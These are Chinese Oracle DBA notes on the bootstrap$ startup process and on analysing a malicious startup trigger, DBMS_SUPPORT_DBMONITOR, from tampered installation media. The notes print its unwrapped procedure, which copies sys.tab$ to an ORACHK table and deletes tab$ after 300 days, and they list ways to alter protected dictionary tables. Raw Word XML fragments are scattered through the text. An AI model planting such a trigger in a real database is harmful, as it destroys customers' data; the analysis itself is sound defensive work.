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 Oracle 数据库的引导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数据库 在Open时，后台会执行一系列的初始化操作。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数据库物理存放在数据文件中，数据库未打开执行，无法获取数据文件的数据，oracle是怎么完成数据文件到内存的初始化呢？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 startup nomount;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session set events='10046 trace name context forever,level 12';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mount;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database open;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PARSING IN CURSOR #139654752073496 len=19 dep=0 uid=0 oct=35 lid=0 tim=1523512262622056 hv=1907384048 ad='7205a8e0' sqlid='a01hp0psv0rrh'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alter database open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WAIT #139654752073496: nam='db file sequential read' ela= 817 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file#=1 block#=520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blocks=1 obj#=-1 tim=1523512263710179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PARSING IN CURSOR #139654752067456 len=188 dep=1 uid=0 oct=1 lid=0 tim=1523512263711046 hv=4006182593 ad='72035f88' sqlid='32r4f1brckzq1'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create table bootstrap$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 line#         number not null,   obj#           number not null,   sql_text   varchar2(4000) not null)   storage (initial 50K objno 59 extents (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file 1 block 520</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/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 OF STMT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PARSING IN CURSOR #140223010152304 len=55 dep=1 uid=0 oct=3 lid=0 tim=1523506149007933 hv=2111436465 ad='720341a8' sqlid='6apq2rjyxmxpj'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FF4635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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select line#, sql_text from bootstrap$ where obj# != :1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 OF STMT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PARSING IN CURSOR #140223010154416 len=458 dep=1 uid=0 oct=1 lid=0 tim=1523506149032032 hv=2997746410 ad='6cfda5e8' sqlid='brwww2atavyra'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FILE$("FILE#" NUMBER NOT NULL,"STATUS$" NUMBER NOT NULL,"BLOCKS" NUMBER NOT NULL,"TS#" NUMBER,"RELFILE#" NUMBER,"MAXEXTEND" NUMBER,"INC" NUMBER,"CRSCNWRP" NUMBER,"CRSCNBAS" NUMBER,"OWNERINSTANCE" VARCHAR2(30),"SPARE1" NUMBER,"SPARE2" NUMBER,"SPARE3" VARCHAR2(1000),"SPARE4" DATE) PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE (  INITIAL 64K NEXT 1024K MINEXTENTS 1 MAXEXTENTS 2147483645 PCTINCREASE 0 OBJNO 17 EXTENTS (FILE 1 BLOCK 232))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END OF STMT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初始化的开始，Oracle 在内存中创建 bootstrap$的结构，是从地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="FF4635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file 1 block 520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读取的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在创建并从数据文件中装载了 bootstrap$的内容之后，Oracle 开始递归的从该表中读取信息，加载数据。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生成其他字典表等  CREATE TABLE FILE$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初始化为什么会找地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF4635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file 1 block 520？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Oracle SYSTEM 表空间的文件头定位了 bootstrap$信息。将 root dba 直接指向了 bootstrap$ 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数据文件头：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Tablespace #0 - SYSTEM  rel_fn:1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Creation   at   scn: 0x0000.00000007 09/17/2011 09:46:08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Backup taken at scn: 0x0000.00000000 01/01/1988 00:00:00 thread:0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reset logs count:0x33b932c6 scn: 0x0000.000f30dc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prev reset logs count:0x2d6c775c scn: 0x0000.00000001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recovered at 04/12/2018 12:09:07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status:0x2004 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>root dba:0x00400208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chkpt cnt: 161 ctl cnt:160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begin-hot-backup file size: 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Checkpointed at scn:  0x0000.0018de15 04/12/2018 13:51:03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thread:1 rba:(0x27.2b2b.10)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》DBA（data block address）理解！！！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362700" cy="45624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1个字节（bytes）=8位（bits）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根据DBA如何知道其表示的文件号，块号呢？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使用plsql程序包 dbms_utility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1 把16进制转换成10进制 to_number('0144D023','xxxxxxxxx')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找到文件号 dbms_utility.data_block_address_file(to_number('0144D023','xxxxxxxxx'))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找到块号  dbms_utility.data_block_address_block(to_number('0144D023','xxxxxxxxx'))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select dbms_utility.data_block_address_file(to_number('400208','XXXXXXXX')) as fno,dbms_utility.data_block_address_block(to_number('400208','XXXXXXXX')) as bno from dual;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      FNO      BNO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 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 1      520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script-DBA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以上：系统表空间的文件头损坏， 或者如果启动对象的数据块损坏后，Oracle 数据库就将无法启动。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以下：bootstrap$引导失败，oracle数据库无法启动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bootstrap$ 中实际上是记录了一些数据库系统基本对象的创建语句。Oracle 通 过 bootstrap$进行引导，进一步创建相关的重要对象，从而启动了数据库。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这些对象是数据库启动所必须的，Oracle 不允许移动或修改，如bootstrap$过程中会用到tab$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select * from bootstrap$ where sql_text like '%TAB$%';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SQL_TEXT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TABLE TAB$("OBJ#" NUMBER NOT NULL,"DATAOBJ#" NUMBER,"TS#" NUMBER NOT NULL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,"FILE#" NUMBER NOT NULL,"BLOCK#" NUMBER NOT NULL,"BOBJ#" NUMBER,"TAB#" NUMBER,"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COLS" NUMBER NOT NULL,"CLUCOLS" NUMBER,"PCTFREE$" NUMBER NOT NULL,"PCTUSED$" NUM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BER NOT NULL,"INITRANS" NUMBER NOT NULL,"MAXTRANS" NUMBER NOT NULL,"FLAGS" NUMBE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 NOT NULL,"AUDIT$" VARCHAR2(38) NOT NULL,"ROWCNT" NUMBER,"BLKCNT" NUMBER,"EMPCN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T" NUMBER,"AVGSPC" NUMBER,"CHNCNT" NUMBER,"AVGRLN" NUMBER,"AVGSPC_FLB" NUMBER,"F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LBCNT" NUMBER,"ANALYZETIME" DATE,"SAMPLESIZE" NUMBER,"DEGREE" NUMBER,"INSTANCES"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NUMBER,"INTCOLS" NUMBER NOT NULL,"KERNELCOLS" NUMBER NOT NULL,"PROPERTY" NUMBER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NOT NULL,"TRIGFLAG" NUMBER,"SPARE1" NUMBER,"SPARE2" NUMBER,"SPARE3" NUMBER,"SPA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RE4" VARCHAR2(1000),"SPARE5" VARCHAR2(1000),"SPARE6" DATE) STORAGE (  OBJNO 4 TA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BNO 1) CLUSTER C_OBJ#(OBJ#)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如果这些表出现问题，bootstrap$过程无法完成，则数据库无法启动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ORA-00704: bootstrap process failure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ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], [], [], [], [], []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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>oracle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安装介质被恶意篡改，注入恶意代码会生成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ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DBMS_SUPPORT_DBMONITOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>触发器和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DBMS_SUPPORT_DBMONITOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存储过程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触发器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DBMS_SUPPORT_DBMONITOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用存储过程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DBMS_SUPPORT_DBMONITOR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create or replace trigger sys.DBMS_SUPPORT_DBMONITORP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after startup on database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  DBMS_SUPPORT_DBMONITORP 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存储过程如下，被加密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create or replace procedure sys.DBMS_SUPPORT_DBMONITORP wrapped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a000000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369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abcd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166 17d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L+Q5S7kOFTBh3pJuFhl03zpaj2EwgzKur9zWZ47SR+pHN0Y8ER0IGya9iryn8BXxVZV99MqT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jPeDOVN1pQjRL9BBh4vtWEKCY/FfMGPnetcyOwrCiZd3y4XmBCby580I22k2zARou4x8Mwl7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GOEcpi6u23Rf2JOnTfA/PYL+pz7A1gvabRQrczX6dnK8HaHsERgX7VdwA3EsM784UwL6ESro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H+CNqON6SdF2HTUFBcmgBBPE/+blRgHQryEpxT3JOnEs1a8gUbjaLq+Xq9Eu9n/kdIwA+9ep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r59hpFLw/vnP7Cjaxk7WbJ6/XGj9F6DH+3MBxpFBmba1tk0pYAW1McQsYXNFbiSdxj1KnrmD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lUETCD2WIxfg3w==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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存储过程解密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[root@db tmp]# java -jar unwrap.jar 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PROCEDURE DBMS_SUPPORT_DBMONITORP IS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DATE1 INT :=10;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BEGIN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SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;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IF (DATE1&gt;=300) THEN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EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';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DELETE SYS.TAB$;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COMMIT;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FF4635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:color w:val="FF4635"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>   EXECUTE IMMEDIATE 'alter system checkpoint';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   END IF;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Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>END;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这里可以明确的看到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DBMS_SUPPORT_DBMONITORP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存储过程备份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tab$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表到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orachk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中然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>delete tab$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触发器是startup类型，启动过程中执行了delete操作，造成open失败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有什么办法修复？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通常情况下是无法移动和修改这些系统表，当操作这些表会报如下错误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ORA-00701: object necessary for warmstarting database cannot be altered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但通过以下模式可以操作这些表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startup migrate;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alter system set event='38003 trace name context forever, level 10' scope=spfile;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是否可以在以上两种模式下将数据重新insert到tab$呢？？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》控制文件与启动校验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在数据库启动过程中除了需要数据一致性校验， 还会进行一系列其他重要的校验工作，比如将数据字典和控制文件进行交叉检查。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如果校验信息不一致怎么办？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答案是：以数据字典为准，系统表空间是数据库的心脏，一切听从“内心”的指示。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以下是已知的几种校验：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1.检验文件大小和创建时间，将文件头记录的文件创建 SCN 与数据字典（file$）比较, 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果数据文件信息与数据字典不符，则出现 ORA-01203 错误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2.检查文件数量，如果数据字典中存在的文件，在控制文件中不存在，就将文件添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加入数据文件；如果控制文件中存在的数据文件在数据字典中不存在，就从控制文件中删除文件。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这种情况通常出现在控制文件重建的时候。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当发现字典中存在，但是控制文件中缺失的文件时，就会主动为控制文 件增加一个缺省命名的文件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 'MISSING00005',数据库找到的'MISSING00005'在 Resetlogs 过程中被离线，并且通常无法再通过正常途径 加入到数据库中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如有足够的归档日志，该文 件仍然可以被恢复出来的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eg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控制文件与数据文件不符，或者恢复时由于归档日志问题不需要一些数据文件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重建控制文件时，去掉了不需要的数据文件，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open成功后，查询去掉的数据文件又出现了！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--公安厅恢复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2021-03-03T08:27:03Z</dcterms:created>
  <dc:creator>xians</dc:creator>
  <cp:lastModifiedBy>Chris</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-03T08:27:10Z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